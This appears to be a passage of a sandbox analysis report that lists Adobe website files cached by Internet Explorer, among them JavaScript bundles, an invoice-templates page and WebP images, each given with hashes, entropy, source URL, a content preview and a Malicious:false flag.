                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):110405
                                                                                                                                                                                                                                                        Entropy (8bit):5.222898217709142
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:BWmeHO9kHfJqtKeH34S1+x2iHcXbIfk75YRpYh1XcxfzTzkOFrCl+zasafXojdjW:BWQkHfJeKeH3BQY1
                                                                                                                                                                                                                                                        MD5:927E6FA55AB244AC1E006C884AA8072E
                                                                                                                                                                                                                                                        SHA1:0B6250B58D417D761F085917E7D4A93E00A2BA89
                                                                                                                                                                                                                                                        SHA-256:47EE874D27CF6862C03E07A1A384334B5BF07808B73013F7D6172F004E63A028
                                                                                                                                                                                                                                                        SHA-512:AB669D340E507C0CAD7E24F714CD3219B38EB885ACF7432A3A637E0D065A6C188BD607BFF50C53CC8FD63F57B79E1C3E6F849C66963A4910977EB9137C3BC5C4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/etc.clientlibs/globalnav/clientlibs/base/feds.js
                                                                                                                                                                                                                                                        Preview: window.__fedsSegmentation = '100';./*! feds v0.51.0 built on Mon, 24 May 2021 06:11:49 GMT */.!function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:r})},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=166)}([,,,,function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var r=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}return function(t,n,r){return n&&e(t.prototype,n),r&&e(t,r),t}}();var i="fedsDebug",o="*",a="Debug mode",s=function(){function e(){var t=this,n=arguments.length>0&&void 0!==argum
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\head.fp-00a38324dab316803fdc74cba4ad7ab9[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with LF, NEL line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):141116
                                                                                                                                                                                                                                                        Entropy (8bit):5.30072949013579
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:oh2bb1H+uuod92HpEMQqgQzDLTSYmv9Ktq2GXevsAUwx/VKbDlWJfwPf:RH+HY0zcuvsAFJs
                                                                                                                                                                                                                                                        MD5:00A38324DAB316803FDC74CBA4AD7AB9
                                                                                                                                                                                                                                                        SHA1:75321253B2C91E253BF2C775B589B2C096AAC1D3
                                                                                                                                                                                                                                                        SHA-256:0CCDD4428614FDCEF969060F2ECC4EC6FF99FEFB968A49B4C987FD4506D33C81
                                                                                                                                                                                                                                                        SHA-512:A927CF78845EFD12E39B058286E1C2ECC503B152C910F334F592A0266E0D340B5066AC6A21EB478DA39F08B647651F0DF1841E7F3D00AE44719C0FC596DDA81E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/etc.hawks.dexterlibs/dexter/clientlibs/base/head.fp-00a38324dab316803fdc74cba4ad7ab9.js
                                                                                                                                                                                                                                                        Preview: !function(e){var t=window.webpackJsonp;window.webpackJsonp=function(n,o,a){for(var s,u,c,l=0,d=[];l<n.length;l++)u=n[l],r[u]&&d.push(r[u][0]),r[u]=0;for(s in o)Object.prototype.hasOwnProperty.call(o,s)&&(e[s]=o[s]);for(t&&t(n,o,a);d.length;)d.shift()();if(a)for(l=0;l<a.length;l++)c=i(i.s=a[l]);return c};var n={},r={6:0};function i(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,i),r.l=!0,r.exports}i.m=e,i.c=n,i.d=function(e,t,n){i.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:n})},i.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="",i.oe=function(e){throw console.error(e),e},i(i.s=584)}([,,function(e,t,n){var r=n(13),i=n(9),o=n(38),a=n(36),s=n(58),u=function(e,t,n){var c,l,d,f,h=e&u.F,p=e&u.G,v=e&u.S,g=e&u.P,m=e&u.B,b=p?r:v?r[t]||(r[t]={}):(r[t]||{}).prototype,y=p?i:i[t]||(i[t]=
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\invoice[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):22551
                                                                                                                                                                                                                                                        Entropy (8bit):5.332580087537197
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:EGwgZLFcb1pEWQHcpO0KsDc9qJJ7QrTzXrQKSR7bfVcPi99D3iXQDENODnyAs8jE:vPwMKBNJS+sv
                                                                                                                                                                                                                                                        MD5:11F3C674241BE29DAB4CB22AA41E455F
                                                                                                                                                                                                                                                        SHA1:219028147C444A7BF89B1E4A1BDA881929463245
                                                                                                                                                                                                                                                        SHA-256:FFB962CFC103A0E9DACCA49FB573635F23181E074D1D1F5802F2A12874225F72
                                                                                                                                                                                                                                                        SHA-512:625686A10035BF4055B4F59426D37E946450F2469E665ACAE9E1C3FF34484775CAAF10E669076F6F2ACB44BA8343B9852ACDC8E65769CBFCE2B0AF58B928A1C0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/invoice
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html><html><head><title>Free Invoice Templates | Adobe Spark</title><link rel="canonical" href="https://www.adobe.com/express/discover/templates/invoice"><meta name="x-source-hash" content="tX6/D+VxAFyUpfMr"><meta name="description" content="With Adobe Spark, choose from dozens of online invoice template ideas to help you easily create your own free invoice in minutes. All creative skill levels are welcome."><meta property="og:title" content="Free Invoice Templates | Adobe Spark"><meta property="og:description" content="With Adobe Spark, choose from dozens of online invoice template ideas to help you easily create your own free invoice in minutes. All creative skill levels are welcome."><meta property="og:url" content="https://www.adobe.com/express/discover/templates/invoice"><meta property="og:image" content="https://www.adobe.com/express/discover/templates/media_1d475ea237f3632359c1538d48da93b1deff5ed7e.png?width=1200&amp;format=pjpg&amp;optimize=medium"><meta property="og:
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\login-bg-thumb-1[1].jpg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 50x33, frames 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3432
                                                                                                                                                                                                                                                        Entropy (8bit):7.7553083669138845
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:RyB4jSX1qpy+R4M+5PFgeNaF8qygsP8CtIWZ+4uadJkY3lco/yIgBWzXx5Lc7XSI:RpUyyCu9mOn8CiokY1co/rgs7xSjS34
                                                                                                                                                                                                                                                        MD5:A7B1798CC2647C575129083BA0B44B17
                                                                                                                                                                                                                                                        SHA1:ADB860A1E675C0FBEFB38A955A5DC4AF9A025B01
                                                                                                                                                                                                                                                        SHA-256:08F9AB3D41530F3E9D8F0780EF1A92F35ED821B5428E6B3C29DDB162F04818FA
                                                                                                                                                                                                                                                        SHA-512:B8828CE68F5C980A9FB880997E5EBAF1533C320820ADC208AABD01B1430FE88DEB7715A900B70951A1F27081E5F6B0FC19A629F14C19552376034CEE1CAA2FF9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/login-bg-thumb-1.jpg
                                                                                                                                                                                                                                                        Preview: ......JFIF.............C....................................................................C.......................................................................!.2..................................................................................h...q.@..;#.P......(.Y...k.....e@F....P.V9.....3wz....X..u....r.!.U..(...Ki...1..y.}h..\..u..m..z...*..K.`..0.W....(...........................6..7uv.48tw...........pQ.ab....j...3......B..$.g....>..1.........p..!L..T8.^..8u..P.W.{Z.....?......=....?..r..y.B......"...09...4.U.;...(w.~...*.a+.E=.;..?H..5.f..i...8.n.-a....#E......K..\..4.]'.O.%....h....I.......:?J.......r.!...!.-$.%FdD.%u......v.T.N.6t.25..[.X.C:/.z..&....E.E.6r.;]N...8BA5..b..k.U.+...nU.y2.!..EU.....6#.X(....``.....L.FwK..ua.I...i?&.\....l.=..t..!.........bI}s)..M..I:s.X.EH.}.NIX!<.4."t.;.p5..ir...u!,Jai..K`.6._.u....O.j5w[2"...a.S.....p;.@....C6CF.b+.zi.S...iG...|}.............i......o..|....3./..).9/.....).........................."..!1A...2
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\login[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):144
                                                                                                                                                                                                                                                        Entropy (8bit):4.569662935032595
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:QIk4Xvwg3e/QgY1ALD6034UQZ6WVSy1ALD6034UQZ4n:QI5oPX7L33lAVwL33ltn
                                                                                                                                                                                                                                                        MD5:73CA2C624770D1F40A24AECE58118E5C
                                                                                                                                                                                                                                                        SHA1:FD8269E651875A5E4B534122C156FF710CB1AF0C
                                                                                                                                                                                                                                                        SHA-256:5FEB6D12A4635F78024E5770685A05CA419A146721A40FBF24735508B79F1718
                                                                                                                                                                                                                                                        SHA-512:BAFB1B056EF5FBC04EF70C4BB102D742FAF2A4284A78599CCAA79FC166FF6F63CC34CDEC7C4972DAF95E208BE27312DA99090AEDCEC681FF4FCBD8790D7D8F83
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: <p>Moved Permanently. Redirecting to <a href="/sp/login?r=reader_page_topbar_createyourown">/sp/login?r=reader_page_topbar_createyourown</a></p>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\main.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13691
                                                                                                                                                                                                                                                        Entropy (8bit):5.381448070810353
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:OYICUsySZX0Ljd0kg41VOEMFWKjzI4omXFKJvm4Qrb7H9g:OrTUUjd0zBEMFWCI+xg
                                                                                                                                                                                                                                                        MD5:2DFF659EF77A2D4E7D76BF2CFC77C59D
                                                                                                                                                                                                                                                        SHA1:6852E5A30F3186122B4CE704DA88D6BABBC4A8A3
                                                                                                                                                                                                                                                        SHA-256:4CF1ADE01D47C67B3312F6750D7BAAA76C1CB0D1384FF654B255DE1A859DE959
                                                                                                                                                                                                                                                        SHA-512:E279C04EE7ACE51A60E9E020BD272122CAD995BD4FA8D4F5658C506F788D33CBBCDCB83A63D8A2513980690D0F30B4927A71766ADD5AEBF6DA680090D2D69DA6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/marketingtech/main.min.js
                                                                                                                                                                                                                                                        Preview: !function(){"use strict";var e,t,n=document,a=Object.defineProperty,i="replace",o=function(e){return e=e[i](/%2523access_token%253D.*?%2526/gim,"%2526")[i](/%23access_token%3D.*?%26/gim,"%26")[i](/#access_token=.*?&/gim,"&")[i](/information=[^\&]+/,"")[i](/puser=[^\&]+/,"")[i](/fnuser=[^\&]+/,"")[i](/lnuser=[^\&]+/,"")};try{var r="referrer",c=n[r],s=o(c);s!==c&&a(n,r,{configurable:!0,value:s})}catch(e){}e=window,t=function(){function e(e,t){u.add(e,t),f||(f=_(u.drain))}function t(e){var t,n=v(e);return null==e||n!=p&&n!=h||(t=e.then),v(t)==h&&t}function n(){for(var e=0;e<this.chain.length;e++)a(this,1===this.state?this.chain[e].success:this.chain[e].failure,this.chain[e]);this.chain.length=0}function a(e,n,a){var i,o;try{!1===n?a.reject(e.msg):(i=!0===n?e.msg:n.call(void 0,e.msg))===a.promise?a.reject(m("Promise-chain cycle")):(o=t(i))?o.call(i,a.resolve,a.reject):a.resolve(i)}catch(e){a.reject(e)}}function i(a){var r,s=this;if(!s.triggered){s.triggered=!0,s.def&&(s=s.def);try{(r=t(a))
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_101f9727a1033fb5ac3d46e6b69ac11257e19c86a[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11080
                                                                                                                                                                                                                                                        Entropy (8bit):7.981022411568333
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:RUjAJU1BR7+R6vERcWwu1Vnf25DNxClMQv4EE027HMBW5bsMJP+/86bpJk1P/coW:JJuB8cQixk2rMBW5bsW+kQCkbnrtlIO
                                                                                                                                                                                                                                                        MD5:1BA5E77FD1D38723D1A8FB1CC22CE46C
                                                                                                                                                                                                                                                        SHA1:2FFB84FB8F991F5CFB5AEDDA8A31452F7DAEB1C3
                                                                                                                                                                                                                                                        SHA-256:C26664FBBA48E40E6B728F78957529F160837B6AB17D02266665DC3D0ECF78DE
                                                                                                                                                                                                                                                        SHA-512:16E9964EA80196CFA9C42BB570C689CFC643D6EE270BBB4C7F27898FC08009548E5156D72C07EDE9D3BDEC0895B1177DFBAEEC0BCC32BF7C51EEFB0111ED737C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_101f9727a1033fb5ac3d46e6b69ac11257e19c86a.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF@+..WEBPVP8 4+.......*,...>u8.H...!#t+....cn..W._.l~..[..k.9....G...e.I..v?................./.?Z~....z...~....o...-...........l.........c.'........Ro.}.....k...........>.>@.#.i........{....?A...O.7..._...~Y.?.../.......O.U.o.....?....(.......G..._................?.|..3...W......q_.?...?f....3>......\/.........yt.vgOE........~.}#&d.T...d3._.?KpyJ./....?.......).di..d..>.".`..p-sLka.)8.m^8..F.1.c&c.I(..9...x.`..+z.'R..1."..LN..~.P..e.+.U.\=ns.j...w+:?.#.&...'.Q. ......E.....T.y$.5F.KS........^...&Y2.'..@:...9..Kg..T....M..so8X..3:jA.K..2...=.m ....].].t.CR..%pNK/.S>...f.3Z.......)...i ...).z.|q. ...0.QV."d'pl...e.Y..._r.U...(|....$...o.......k+........yFQ..........ee..;u.M3.......q...T.G...v..V.<.=..Qe.N..hK.0..-.3.b<[.\Jk.M.5....M...0...8...T.B.<y...a..R..2.72..Y}..h....].gU.9...../}..-....xOA..t....+...V..aK.[...i......a.8..8`E.H.qf}...x.....Y*m..'.A.(.$8..Te...F..S..&Cb..3._.....!4.....U..}.N.c.......C...O..3DL..e..."......f.*b...F...*8.. ....'eU.a.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1022d55369c9618986ad93c5a25072f4185e4b63a[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):12940
                                                                                                                                                                                                                                                        Entropy (8bit):7.98424550109483
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:qX673J/v8tEwqkc3MpDWpJKDcNDkTXW6TbngBAwbaaRNLf9ZzzvhWASQBTi3:467Z/vdwqMK9eTLgBAgPRpzzppSn3
                                                                                                                                                                                                                                                        MD5:CBB822B3610F0F88F63E7CAA760AF243
                                                                                                                                                                                                                                                        SHA1:478FFB41B30274991338A7FA1D271D77D08DC2E3
                                                                                                                                                                                                                                                        SHA-256:2EEE17EBF0717CB72C5F48B14123ABFE9406C6D90BE3A6A9BD6BC778C5700E9B
                                                                                                                                                                                                                                                        SHA-512:88D7E67579A9A1347851F7FA45E661BDA50EAC6EC7F023FA6D883065366926D9BBFC961BC238747CFD4BCB31FEB954E1DB5A9D94DCB62045E063DA7DD5EB6D07
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1022d55369c9618986ad93c5a25072f4185e4b63a.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.2..WEBPVP8 x2......*..k.>u4.H$..!'4\....bn.!...o....}..O..z.....?.}..?.K\{.+...........................'......t=i?.~.{......[.w.../.....?.^...=........K...........c.....C..?....7.w..=.}....}......{....F..m.G..}.|..............z....3..Q...L.+...~.Q.....e..?.9.C.E?~.]3.T(0..C..L+s9m....h..L.W&].1r.*o.Y....9.....R..&.L........5.[|#.x|........E...S...xV.&..V.;.3..T..`.Lv..O.,K....{....bN.4..QU...Q...... .u..ltV........]vs2n*.X=NO..c.t..s,t.2.QC.?..c....{"t..~.....W..H.i.......5Z...C.X.p.Z..l.....n/...5..8!.$.,.#......./..w.. ....^q".>l.q.<.n...K.?..MG.U..N............R....%..6..1.....{~..7.o.N._.BN.o.2}.......4....Rc.....].O...Jw?x.. z&.........2F..5|..#z......?n.9.........s.0.... ...hNY.p..g.Q...BGt.P.../6.I@.7w..$. .b9...O...C{9..+.......+......a.*..!wrX..9"..).=.=.]/^....g.l.6.D9{C .;t.h...G.{..Ks..9..o..30....."...X.H.D...4r.k...g.tf=...7..._.x.g0zLG..yiB.r.mW.9T/4'0UZ...WMVX.Vw....mBD..../4.R..N.SA...)`u90.M.-.zk..q{.....>......fQ..EX..h
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_102523b575492841801eee551ccfbc5fca141ecdf[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1375
                                                                                                                                                                                                                                                        Entropy (8bit):7.815201770698623
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:siUhSf+2M0ZpZqCvr/ocRQAOFf/CfKj6jGvFy0PCEU+zQaqTHZ0Vwt:siUhA7LvrgUSJ/T+CvFycxU+lqTL
                                                                                                                                                                                                                                                        MD5:33CB3F22104C1E116E3E02AE915C5461
                                                                                                                                                                                                                                                        SHA1:57AC93319CF9FB85971DBD8273E63B32D8096C66
                                                                                                                                                                                                                                                        SHA-256:0DCC444CC2B9086AA89C8EBB3353869AB5C59767D9540464F17C91C17A9484D4
                                                                                                                                                                                                                                                        SHA-512:44859D2878986FF4503159395845CBA4AD7D5DE6384D254EB991862E5D83C62610A2A65189E1646BDE7DA68159D958635E9A3E4D0CF79BFC66C97427AFFBC28D
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8X........a..;..ALPH.`....Gn$I.z).V$..pU...#.?..a.....D>.....~........O..~...S>._.K.S1/Q........f...P...J.X..I:Q.z..$.V.....8r.F.d.....{.{DL...=.&..3.DS...ie.`...........V?..V.h..j.....@C?..p.].n..$lg.R+...$\...$A.$....<.T...YDfF...EL.-....irC.p....&.{...m.h.>..II.q&..]...b]..w_....u..d..I.El.DR.\vf.....IV.h.O..s.{A..~c....$I..2....{.{.75f...U.!...TDH$..WD..d..t..@...A^..$.$Id....F.....xd.)..E"...6....Va.N.......#............R.. ...$.$..~.."..3..Q....3[.T.._5.C.6m.B.Dc...s.s....".b....h..~.sc>{.>."I=.:..U."...@f........,L.b.\.W........).....ps.}.#D.n.<...d......frd........4.j.Zw...{;.p.DP...H6..}.P...+.5X<v..:.."....g[j.... .:/.&.'<.?yx.Ew..&}y..9g....S..=....s..*.[x..Z ?/..W8.........g...d{....m....C..5...=.D/.l..;`{Yf..ko.@........RZ....._.?.......m...E...D......&...=P..<...4.hJ.\..#..1f..NF...7..>..A.7G.E......p7>..m.....ma.sy..m..DF...3..@../..^.<.....4...L.<zJ./.!.bkX+8....J..#}...j...o...|..r.../W.i..O.P.. H.D9G.{
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_106afd3797eb2a517c646ebca3f2ca33b6f7cbc1f[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13470
                                                                                                                                                                                                                                                        Entropy (8bit):7.983517407990372
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:24JNlMW+H+3lPfzkNvpaAEykLcHypRhw2FYgJ4Z8aKCvMBr:24J3aQPfwNvppEX4Ha9KrZKRBr
                                                                                                                                                                                                                                                        MD5:F44C4E9822BC37504FD35B946CE4D6AB
                                                                                                                                                                                                                                                        SHA1:DE7870635E9B8B83060048B9A6237E2BA5614A61
                                                                                                                                                                                                                                                        SHA-256:34FCF35AB3F931C64AB6B742B954D3CAFAA163787BB9660B37A7B245F8D546E1
                                                                                                                                                                                                                                                        SHA-512:7A7C68083966A04D58495CCD15F9C5DD0AE255A34BD7847AE6D0C386E2965B8B9897F5FF1DD226BF1E13F60AE9B2A7E3A72BD8B57E683AF04114475C57DACA94
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_106afd3797eb2a517c646ebca3f2ca33b6f7cbc1f.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.4..WEBPVP8 .4..0....*..k.>u4.G...!&.....eK.{....S...{..')...=.y.}.?.....#......C.s.w..TG........p._.~?.............>e./.g.....{?...........r.....g.....?.<[....@.Z.w.........?....3..?......M.+....._._....y.......?.?....&............?........_..._......8...[.?._..n.......X?e......k.=.....u.e[X.sw....q..\..5*d..o7.M.....hY.....8@p.......$.N..:..P.|....?+}. ..`Fgy...!*.i...."p.P....V.J.|.{m.9R..R.v...}MFa.._+.t.n...g..~....Cr{.....Y.h..^x.a.C.$.k...Uq.k:.?..........t.-.......LX.:..z..w.S../.....R...t...%.M...\i?s.z..].3..oD...n..r...|.|....M.../...X...D".;_...5J...o#..<.x@.!....;...w>...OS.."*......(`.... .i#t.]..@R./..N.NsG-..X.OQ.Q..1....=1..Zd..d.T.............a..K..FXr.<u.p-......J..?.]...Mp).@*.l...,.e..'..+......7.,O....xrx..G.#....k.... .PM1.L%r.=|.l.....N.?d......,Q.NS\.p.......}..).i....O...G...n:"...-n.qE.4.#4GS......v..n......L....^.....;#.'+.,...&\P.9.2....GKdL..A.3P......_.....SSD.)..nv......8.d.;W..$]..f.m......
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_1137e79890ce81304b92d7de7a647c33a4dccc5cf[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10166
                                                                                                                                                                                                                                                        Entropy (8bit):7.980335588969246
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:Nqz5k4EZWcOb+Pdabb/J7Kek2aDZMdjKraGVlml4jVeFqJ+0y4UNUIlt6u:NqVk4EZWtPb/J7KUrZIlml4jVe0J+0yB
                                                                                                                                                                                                                                                        MD5:AC4B894929F12B25E4AC637F21948D49
                                                                                                                                                                                                                                                        SHA1:BFCEBDBC9077D935395CE6B55456E3B5CC7BF51B
                                                                                                                                                                                                                                                        SHA-256:83AD177DD306C271A7A0103CCE1606099C6901C231FE98E5A5DF2A4FEC52FEE9
                                                                                                                                                                                                                                                        SHA-512:0C1218A5AF0F655A8E60A101529B0045E1D23C34355B6E917E84BAC884D1EEA896D0F8FBEB0D78E326D3020AAB9C5D4A1D18AF7D92B31498D950409EA1F3A17C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1137e79890ce81304b92d7de7a647c33a4dccc5cf.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.'..WEBPVP8 .'.......*..k.>u6.H$.".&.j....in.`2..o...C<.......o............;........n.......G....!.Y.'.O..._..%.i....g...c..........k..............._......#...o./........s..._.../.........W...?................o...u..............QWz%...c.h..3V...L}M..fj...Z....7..[...A1.4.}]...8&..}.....kM.m..g@.5.z,.X'..I{mi..Z....D..{_^c=.8...T.z....[>......%.....i..7~....?....g.....57.1...y.&.|..i:b5..(.y...H.N...E..3.Vw..Ji<...+-...Y.. .q.m:.j.D....P.>..#Vr....N..eW..?&..4:,M.{}..Ew...'...D.Y.../..W.@H...\..e....;O.E.Wr|..U..?U.nB..".C.....W.R.y.....|+Z...2..-..=)....o}t(jh|..>...H.L.:....s......T7...._h....Z.YO.|...!["'..9/.....f(!.7M.LS.e..i..Q..}<g..d^.V).B..u.bB.}.'..@..N...b..C.@...wL....5*...q......$#...7e.2.Z...M...0t^...........W4HK...h....\...#.&......f.....0@b?'...?....r].$V).......^<....4....A...S.h......wp.SI.be+..t...>..{...2=.Z@%.......5].0.X.....Fm.R...]._. .s..'...{q.....&"K..A"..n..\.......N...}(5.......J-m.....U.u..E.K...!Hf.=...m.d"..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\media_11c0416d7e23b581a6b3ff64a21556c58f4bc48dc[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10444
                                                                                                                                                                                                                                                        Entropy (8bit):7.980543516311219
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:lfPKxAJpp4Mvxs2GecehRvHsrcUjVIEo0jgJNfmtVPyaMnBq7z:lfPKGVx4hKR0cb+4mEgX
                                                                                                                                                                                                                                                        MD5:6094E8A642543AF2AE4964AAB300E37E
                                                                                                                                                                                                                                                        SHA1:309EFC83AD0A6829EA53F7759FAACF219E41A055
                                                                                                                                                                                                                                                        SHA-256:6EBC7CE5A79FFA01FFC3FA65D1749DAFD0A7153C538223CAD1844E9C3875603B
                                                                                                                                                                                                                                                        SHA-512:40DAF9B86D99579931ACBD81EBE7EE8EA209DDFB256D576AEB501AF3A28F6886C3B42268495C498DE11FC0A6F239ECE43E219E4F7C98C66689B041CD2BA937B7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_11c0416d7e23b581a6b3ff64a21556c58f4bc48dc.png?width=2000&format=webply&optimize=medium
